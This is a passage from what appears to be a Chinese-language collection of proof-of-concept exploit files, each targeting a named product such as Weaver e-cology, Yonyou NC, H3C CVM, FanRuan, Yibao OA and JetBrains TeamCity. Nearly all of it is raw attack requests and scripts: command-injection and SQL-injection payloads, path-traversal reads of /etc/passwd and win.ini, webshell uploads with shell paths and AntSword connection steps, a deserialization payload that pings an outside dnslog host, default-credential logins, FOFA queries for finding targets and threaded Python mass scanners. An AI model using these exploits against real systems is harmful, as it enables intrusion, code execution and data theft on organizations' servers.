17 | ------WebKitFormBoundaryL7ILSpOdIhIIvL51
18 | Content-Disposition:form-data; name="extendId"
19 |
20 | ../../../../resource/help/km/review/
21 | ------WebKitFormBoundaryL7ILSpOdIhIIvL51
22 | Content-Disposition:form-data; name="folderName"
23 |
24 | ../../../ekp/sys/common
25 | ------WebKitFormBoundaryL7ILSpOdIhIIvL51--
26 |
27 | /resource/help/kms/knowledge/dataxml.jsp
28 | ```
29 |
30 |
--------------------------------------------------------------------------------
/电信网关 ipping.php 命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ***\*fofa-qeury:body="a:link{text-decoration:none;color:orange;}"\****
2 |
3 | 1.获取cookie->默认密码登录->ipping.php接口命令执行得到结果
4 |
5 | ```
6 |
7 | GET /manager/index.php HTTP/1.1
8 | Host:
9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
10 | Content-Type: application/x-www-form-urlencoded
11 | Content-Length: 21
12 |
13 |
14 | POST /manager/login.php HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
17 | Content-Type: application/x-www-form-urlencoded
18 | Content-Length: 21
19 | Cookie: {{phpsessid}}
20 |
21 | Name=admin&Pass=admin
22 |
23 |
24 | POST /manager/ipping.php HTTP/1.1
25 | Host:
26 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
27 | Content-Type: application/x-www-form-urlencoded
28 | Content-Length: 24
29 | Cookie: {{phpsessid}}
30 |
31 | ipaddr=127.0.0.1;echo 237219737;
32 | ```
33 |
34 | 
--------------------------------------------------------------------------------
/宏景eHR sdutygetSdutyTree SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /w_selfservice/oauthservlet/%2e./.%2e/servlet/sduty/getSdutyTree?param=child&target=1&codesetid=1&codeitemid=1%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28119%29%2BCHAR%2885%29%2BCHAR%2873%29%2BCHAR%2887%29%2BCHAR%2899%29%2BCHAR%2875%29%2BCHAR%28116%29%2BCHAR%2872%29%2BCHAR%28113%29%2BCHAR%28104%29%2BCHAR%28107%29%2BCHAR%2889%29%2BCHAR%28115%29%2BCHAR%28108%29%2BCHAR%2873%29%2BCHAR%2884%29%2BCHAR%2869%29%2BCHAR%2873%29%2BCHAR%2875%29%2BCHAR%2883%29%2BCHAR%2898%29%2BCHAR%28116%29%2BCHAR%28120%29%2BCHAR%2889%29%2BCHAR%2884%29%2BCHAR%2882%29%2BCHAR%28120%29%2BCHAR%2884%29%2BCHAR%28116%29%2BCHAR%2888%29%2BCHAR%28112%29%2BCHAR%2887%29%2BCHAR%2873%29%2BCHAR%28109%29%2BCHAR%28104%29%2BCHAR%2887%29%2BCHAR%28102%29%2BCHAR%2897%29%2BCHAR%2877%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28113%29%2CNULL%2CNULL--+Iprd HTTP/1.1
3 | Host: your-ip
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
5 | ```
6 |
7 |
--------------------------------------------------------------------------------
/H3C-CVM-upload接口前台任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/a.jsp&name=123 HTTP/1.1
3 | Host: your-ip
4 | Content-Range: bytes 0-10/20
5 | Referer: http://your-ip/cas/login
6 | Accept-Encoding: gzip
7 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 |
9 | <%out.println("test");%>
10 | ```
11 |
12 |
13 |
14 | ```
15 | POST /cas/fileUpload/fd HTTP/1.1
16 | Host:
17 | Accept-Encoding: gzip, deflate
18 | Accept: */*
19 | Connection: close
20 | Content-Type: multipart/form-data; boundary=a4d7586ac9d50625dee11e86fa69bc71
21 | Content-Length: 217
22 |
23 | --a4d7586ac9d50625dee11e86fa69bc71
24 | Content-Disposition: form-data; name="token"
25 |
26 | /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/stc11.jsp
27 | --a4d7586ac9d50625dee11e86fa69bc71
28 | Content-Disposition: form-data; name="file"; filename="123.jsp"
29 | Content-Type: image/png
30 |
31 | <% out.println("215882935");%>
32 | --a4d7586ac9d50625dee11e86fa69bc71--
33 | ```
34 |
35 |
--------------------------------------------------------------------------------
/启明星辰-天清汉马VPN接口download任意文件读取.md:
--------------------------------------------------------------------------------
1 | ## 测绘
2 |
3 | ```
4 | icon_hash="-15980305"app="网御星云-VPN" || (body="select_auth_method" && body="select_auth_input") || app="启明星辰-天清汉马VPN"
5 | ```
6 |
7 | ### POC
8 |
9 | ```
10 | GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1
11 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
12 | Accept-Encoding: gzip, deflate, br, zstd
13 | Accept-Language: zh-CN,zh;q=0.9
14 | Connection: keep-alive
15 | Cookie: VSG_VERIFYCODE_CONF=0-0; VSG_CLIENT_RUNNING=false; VSG_LANGUAGE=zh_CN; VSG_CSRFTOKEN=1ec96cd6acc254fcf9e9cd6d1e85cf23
16 | Host:
17 | Sec-Fetch-Dest: document
18 | Sec-Fetch-Mode: navigate
19 | Sec-Fetch-Site: none
20 | Sec-Fetch-User: ?1
21 | Upgrade-Insecure-Requests: 1
22 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
23 | sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
24 | sec-ch-ua-mobile: ?0
25 | sec-ch-ua-platform: "Windows"
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/帆软未授权命令执行.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Faaa.jsp%27%20as%20gggggg%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20gggggg.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20gggggg.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)} HTTP/1.1
3 | Host:
4 | Cache-Control: max-age=0
5 | Upgrade-Insecure-Requests: 1
6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
7 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 | Accept-Encoding: gzip, deflate, br
9 | Accept-Language: zh-CN,zh;q=0.9
10 | Connection: keep-alive
11 |
12 | /webroot/aaa.jsp
13 | ```
14 |
15 | 蚁剑进行连接,添加get参数?a=javax.script.ScriptEngineManager,密码为b,类型选择JSPJS
16 |
--------------------------------------------------------------------------------
/泛微 e-cology9 servicesWorkPlanService 前台SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /services/WorkPlanService HTTP/1.1
3 | Host:
4 | Content-Length: 380
5 | Cache-Control: max-age=0
6 | Upgrade-Insecure-Requests: 1
7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/120.0.6367.118 Safari/537.36
8 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i
9 | mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
10 | Accept-Encoding: gzip, deflate, br
11 | Accept-Language: zh-CN,zh;q=0.9
12 | SOAPAction:
13 | Content-Type: text/xml;charset=UTF-8
14 | Referer: http://0.0.0.0/services/WorkPlanService
15 | Cookie: ecology_JSessionid=bibwzto5sdeg43J9Fz0iu
16 | Connection: close
17 |
18 |
20 |
21 |
22 |
23 |
24 | (SELECT 123 FROM
25 | (SELECT(SLEEP(3-(IF(1=1,0,5)))))NZeo)
26 |
27 | 22
28 |
29 |
30 |
31 | ```
32 |
33 |
--------------------------------------------------------------------------------
/建文工程项目管理软件BusinessManger存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /AppInterface/Business/BusinessManger.ashx HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 | Content-Type: application/x-www-form-urlencoded
6 | Accept-Encoding: gzip
7 | Connection: close
8 |
9 | method=PrjType&content=%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%2898%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28121%29%2BCHAR%2874%29%2BCHAR%28104%29%2BCHAR%2885%29%2BCHAR%2870%29%2BCHAR%28120%29%2BCHAR%2890%29%2BCHAR%2865%29%2BCHAR%28116%29%2BCHAR%2868%29%2BCHAR%2899%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%2875%29%2BCHAR%2875%29%2BCHAR%28109%29%2BCHAR%28117%29%2BCHAR%2881%29%2BCHAR%2897%29%2BCHAR%2884%29%2BCHAR%2870%29%2BCHAR%28118%29%2BCHAR%2874%29%2BCHAR%2890%29%2BCHAR%2880%29%2BCHAR%28101%29%2BCHAR%2868%29%2BCHAR%28119%29%2BCHAR%28113%29%2BCHAR%2885%29%2BCHAR%28122%29%2BCHAR%2875%29%2BCHAR%2878%29%2BCHAR%28112%29%2BCHAR%28115%29%2BCHAR%28103%29%2BCHAR%2866%29%2BCHAR%2868%29%2BCHAR%28105%29%2BCHAR%2873%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29--+tftC
10 | ```
11 |
12 |
--------------------------------------------------------------------------------
/易宝OA ExecuteSqlForSingle SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```python
2 | import requests
3 | import concurrent.futures
4 |
5 | def check_vulnerability(target):
6 |
7 | headers = {
8 | "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
9 | "Content-Type": "application/x-www-form-urlencoded"
10 | }
11 | data = {
12 | "token": "zxh",
13 | "sql": "select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)",
14 | "strParameters": ""
15 | }
16 | try:
17 | res = requests.post(f"{target}/api/system/ExecuteSqlForSingle", headers=headers,data=data,timeout=5)
18 | if "e10adc3949ba59abbe56e057f20f883e" in res.text and "success" in res.text:
19 | print(f"{target} 漏洞存在")
20 | with open("attack.txt", 'a') as f:
21 | f.write(f"{target}\n")
22 | else:
23 | print(f"{target} 漏洞不存在")
24 | except:
25 | print(f"{target} 访问错误")
26 |
27 | if __name__ == "__main__":
28 | f = open("target.txt", 'r')
29 | targets = f.read().splitlines()
30 |
31 | # 使用线程池并发执行检查漏洞
32 | with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
33 | executor.map(check_vulnerability, targets)
34 | ```
35 |
36 |
--------------------------------------------------------------------------------
/创客13星零售商城系统前台任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /Login/shangchuan HTTP/1.1
3 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 | Accept-Encoding: gzip, deflate, br, zstd
5 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
6 | Cache-Control: max-age=0
7 | Connection: keep-alive
8 | Content-Length: 197
9 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBP56KuZOdlY4nLGg
10 | Host: 127.0.0.1
11 | Origin: http://127.0.0.1
12 | Referer: http://127.0.0.1/Login/shangchuan
13 | Sec-Fetch-Dest: document
14 | Sec-Fetch-Mode: navigate
15 | Sec-Fetch-Site: none
16 | Upgrade-Insecure-Requests: 1
17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
18 | sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
19 | sec-ch-ua-mobile: ?0
20 | sec-ch-ua-platform: "Windows"
21 | sec-fetch-user: ?1
22 |
23 | ------WebKitFormBoundary03rNBzFMIytvpWhy
24 | Content-Disposition: form-data; name="file"; filename="1.php"
25 | Content-Type: image/jpeg
26 |
27 |
28 | ------WebKitFormBoundary03rNBzFMIytvpWhy--
29 | ```
30 |
31 |
--------------------------------------------------------------------------------
/易宝OA 存在BasicService存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /WebService/BasicService.asmx HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
5 | Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
6 | Accept-Encoding: gzip, deflate, br
7 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
8 | Connection: close
9 | Content-Type: text/xml; charset=utf-8
10 | Content-Length: 501
11 |
12 |
13 |
14 |
15 |
16 | MTIzNA==
17 | ../../manager/2.txt
18 | {ac80457b-368d-4062-b2dd-ae4d490e1c4b}
19 |
20 |
21 |
22 | ```
23 |
24 | 出现如下数据代表漏洞存在:url+2.txt
25 |
26 | 
27 |
28 | ***\*fofa:\****title="欢迎登录易宝OA系统" || banner="易宝OA"
--------------------------------------------------------------------------------
/好视通视频会议系统存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```python
2 | import requests
3 | import concurrent.futures
4 |
5 | def check_vulnerability(target):
6 | headers = {
7 |
8 | "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
9 | "Content-Length":"0"
10 | }
11 | try:
12 | # print(target)
13 | res = requests.get(f"{target}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini", headers=headers, timeout=5,verify=False)
14 | if "extensions"in res.text and "CMCDLLNAME32" in res.text:
15 | print(f"[+]{target}漏洞存在")
16 | with open("attack.txt",'a') as fw:
17 | fw.write(f"{target}\n")
18 | else:
19 | print(f"[-]{target}漏洞不存在")
20 | except Exception as e:
21 | print(f"[-]{target}访问错误")
22 |
23 | if __name__ == "__main__":
24 | print("target.txt存放目标文件")
25 | print("attack.txt存放检测结果")
26 | print("按回车继续")
27 | import os
28 | os.system("pause")
29 | f = open("target.txt", 'r')
30 | targets = f.read().splitlines()
31 | print(targets)
32 |
33 | with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor:
34 | executor.map(check_vulnerability, targets)
35 | ```
36 |
37 |
--------------------------------------------------------------------------------
/用友NC任意文件读取.md:
--------------------------------------------------------------------------------
1 | ```python
2 | import requests
3 | import concurrent.futures
4 |
5 | def check_vulnerability(target):
6 | headers = {
7 | "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
8 | }
9 |
10 | try:
11 | # print(target)
12 |
13 | res = requests.get(fr"http://{target}/portal/pt/xml/file/download?pageId=login&filename=..\index.jsp", headers=headers, data=r"decorator=%2FWEB-INF%2Fweb.xml&confirm=true", timeout=5)
14 | if "window.location" in res.text :
15 | print(f"[+]{target}漏洞存在")
16 | with open("attack.txt",'a') as fw:
17 | fw.write(f"{target}\n")
18 | else:
19 | print(f"[-]{target}漏洞不存在")
20 | except Exception as e:
21 | print(f"[-]{target}访问错误")
22 | if __name__ == "__main__":
23 | print("target.txt存放目标文件")
24 | print("attack.txt存放检测结果")
25 | print("------------------------")
26 | print("按回车继续")
27 | import os
28 | os.system("pause")
29 | f = open("target.txt", 'r')
30 | targets = f.read().splitlines()
31 | print(targets)
32 |
33 | # 使用线程池并发执行检查漏洞
34 | with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
35 | executor.map(check_vulnerability, targets)
36 | ```
37 |
38 |
--------------------------------------------------------------------------------
/深澜计费管理系统strategy存在反序列化漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /strategy/ip/bind-ip HTTP/2
3 | Host:
4 | Cookie: lang=zh-CN; PHPSESSID_8080=f434cd5f5e9befe38ab3d688b49eacb5; _csrf-8080=515a2ce1d579e3eb33de0fb00d2eddb40cbfb5db938eb248ddaa2069ed9ba803a%3A2%3A%7Bi%3A0%3Bs%3A10%3A%22_csrf-8080%22%3Bi%3A1%3Bs%3A32%3A%22zKeB2l7C4-gTmKM4dulmKqnWGCnlHFDP%22%3B%7D
5 | Cache-Control: max-age=0
6 | Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
7 | Sec-Ch-Ua-Mobile: ?0
8 | Sec-Ch-Ua-Platform: "Windows"
9 | Upgrade-Insecure-Requests: 1
10 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
11 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
12 | Sec-Fetch-Site: none
13 | Sec-Fetch-Mode: navigate
14 | Sec-Fetch-User: ?1
15 | Sec-Fetch-Dest: document
16 | Accept-Encoding: gzip, deflate
17 | Content-Type: application/x-www-form-urlencoded
18 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
19 | Content-Length: 1265
20 |
21 | data1=O%3A33%3A%22setasign%5CFpdi%5CPdfReader%5CPdfReader%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00parser%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7B
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/任我行协同CRM反序列化漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /SystemManage/UploadFile HTTP/1.1
3 | Host:
4 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 | Upgrade-Insecure-Requests: 1
6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
7 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 | Accept-Encoding: gzip, deflate
9 | Content-Type: application/x-www-form-urlencoded
10 | Content-Length: 8
11 | cmd: whoami
12 |
13 | photoInfo={{base64dec(ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywgJy9jIHBpbmcgYWU1d3BiLmRuc2xvZy5jbiddDQogICAgfSwNCiAgICAnT2JqZWN0SW5zdGFuY2UnOnsnJHR5cGUnOidTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSd9DQp9)}}
14 | ```
15 |
16 |
--------------------------------------------------------------------------------
/明源云ERP接口ApiUpdate.ashx文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
4 | Host: target.com
5 | Accept-Encoding: gzip
6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 | Content-Length: 856
8 |
9 | {{unquote("PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00")}}
10 | vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&
11 | memory=16&diskSize=16&desc=&uid=640be59da4851&type=za
12 | ```
13 |
14 |
--------------------------------------------------------------------------------
/F-logic DataCube3存在命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | 获取accesstime
2 |
3 | ```
4 | GET /admin/setting_photo.php HTTP/1.1
5 | Host:
6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
7 | Accept-Encoding: gzip, deflate
8 | ```
9 |
10 | 使用获取到accesstime填入到下面
11 |
12 | ```
13 | POST /admin/config_time_sync.php HTTP/1.1
14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
15 | Accept-Encoding: gzip, deflate
16 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
17 | Cache-Control: max-age=0
18 | Connection: keep-alive
19 | Content-Length: 116
20 | Content-Type: application/x-www-form-urlencoded
21 | Cookie: SESS_IDS=24ef0vbucnke26mtreijnfumve
22 | Host: x.x.x.x
23 | Upgrade-Insecure-Requests: 1
24 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
25 |
26 | accesstime=0.66992700 1710752870&execute=&ntp_enable=&ntp_server=127.0.0.1|id >aaa.txt|&ntp_retry_count=1
27 | ```
28 |
29 |
30 |
31 | ```
32 |
33 | GET /admin/aaa.txt HTTP/1.1
34 | Host:
35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
36 | Accept-Encoding: gzip, deflate
37 | ```
38 |
39 |
--------------------------------------------------------------------------------
/Jetbrains_Teamcity_远程代码执行漏洞_CVE_2023_42793.md:
--------------------------------------------------------------------------------
1 | ```
2 | DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
3 | Host:
4 | Content-Type: application/x-www-form-urlencoded
5 |
6 |
7 | POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
8 |
9 |
10 |
11 | POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
12 | Host:
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
14 | Connection: close
15 | Authorization: Bearer [管理员token]
16 | Content-Type: application/x-www-form-urlencoded
17 | Accept-Encoding: gzip, deflate, br
18 | Content-Length: 0
19 |
20 |
21 | POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
22 | Host:
23 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
24 | Connection: close
25 | Authorization: Bearer [管理员token]
26 | Content-Type: application/x-www-form-urlencoded
27 | Accept-Encoding: gzip, deflate, br
28 | Content-Length: 0
29 |
30 |
31 |
32 | POST /app/rest/debug/processes?exePath=id&parms=-a HTTP/1.1
33 | Host:
34 | Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.MjFfTWxGODVqLXdTMmNfRjRldk9pMXNQSk1B.MTg1YTZlYzQtMDJlZi00NzljLWFhOWYtMmJiODYzYTYzODNj
35 | ```
36 |
37 |
--------------------------------------------------------------------------------
/泛微云桥文件上传.md:
--------------------------------------------------------------------------------
1 | ```http
2 | POST /wxclient/app/recruit/resume/addResume?fileElementId=H HTTP/1.1
3 | Host: 127.0.0.1:8088
4 | Content-Length: 361
5 | Cache-Control: max-age=0
6 | sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
7 | sec-ch-ua-mobile: ?0
8 | sec-ch-ua-platform: "Windows"
9 | Upgrade-Insecure-Requests: 1
10 | Origin: null
11 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
13 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
14 | Sec-Fetch-Site: cross-site
15 | Sec-Fetch-Mode: navigate
16 | Sec-Fetch-User: ?1
17 | Sec-Fetch-Dest: document
18 | Accept-Encoding: gzip, deflate
19 | Accept-Language: zh-CN,zh;q=0.9
20 | Connection: close
21 |
22 | ------WebKitFormBoundaryD5Mawpg068t7pbxZ
23 | Content-Disposition: form-data; name="file"; filename="shell.jsp"
24 | Content-Type: application/octet-stream
25 |
26 | 127
27 | ------WebKitFormBoundaryD5Mawpg068t7pbxZ
28 | Content-Disposition: form-data; name="file"; filename="shell.jsp"
29 | Content-Type: application/octet-stream
30 |
31 | 127
32 | ------WebKitFormBoundaryD5Mawpg068t7pbxZ--
33 | ```
34 |
35 | shell地址:
36 |
37 | /upload/202408/1-2位大写字母/shell.jsp
--------------------------------------------------------------------------------
/APP分发签名系统index-uplog.php存在任意文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1
3 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 | Accept-Encoding: gzip, deflate, br, zstd
5 | Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
6 | Cache-Control: max-age=0
7 | Connection: keep-alive
8 | Content-Length: 290
9 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfF7NbGp0PAFq8Mkd
10 | Host: 127.0.0.1
11 | Origin: http://127.0.0.1
12 | Referer: http://127.0.0.1/source/pack/upload/2upload/index-uplog.php
13 | Sec-Fetch-Dest: document
14 | Sec-Fetch-Mode: navigate
15 | Sec-Fetch-Site: none
16 | Upgrade-Insecure-Requests: 1
17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
18 | sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
19 | sec-ch-ua-mobile: ?0
20 | sec-ch-ua-platform: "Windows"
21 | sec-fetch-user: ?1
22 |
23 | ------WebKitFormBoundary03rNBzFMIytvpWhy
24 | Content-Disposition: form-data; name="time"
25 |
26 | 1-2
27 | ------WebKitFormBoundary03rNBzFMIytvpWhy
